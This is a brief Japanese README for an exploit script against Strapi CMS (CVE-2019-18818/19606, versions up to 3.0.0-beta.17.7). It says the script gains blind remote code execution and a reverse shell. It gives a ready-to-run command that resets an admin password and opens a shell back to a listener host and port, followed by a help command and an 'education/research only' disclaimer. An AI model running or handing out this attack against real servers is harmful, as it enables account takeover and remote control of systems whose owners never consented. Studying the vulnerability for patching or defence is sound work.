
CVE-2019-18818/19606 Strapi RCE
Strapi CMS バージョン 3.0.0-beta.17.7 以前における Blind Remote Code Execution でリバースシェルを取得
python3 strapi_exp.py -t http://strapi.hack/ -e [email protected] -p new_password -lhost 127.0.0.1 -lport 9001
ヘルププロンプト
python3 strapi_exp.py -h
このリポジトリで提供されるすべてのコードは、教育/研究目的のみに使用されます。このリポジトリに含まれる資料に関連するいかなる行動および/または活動も、すべて利用者の責任です。このリポジトリのコードを悪用すると、当該人物に対する刑事告訴が行われる可能性があります。著者は、このリポジトリのコードを悪用して法律を破った個人に対して刑事告訴が行われた場合、一切の責任を負いません。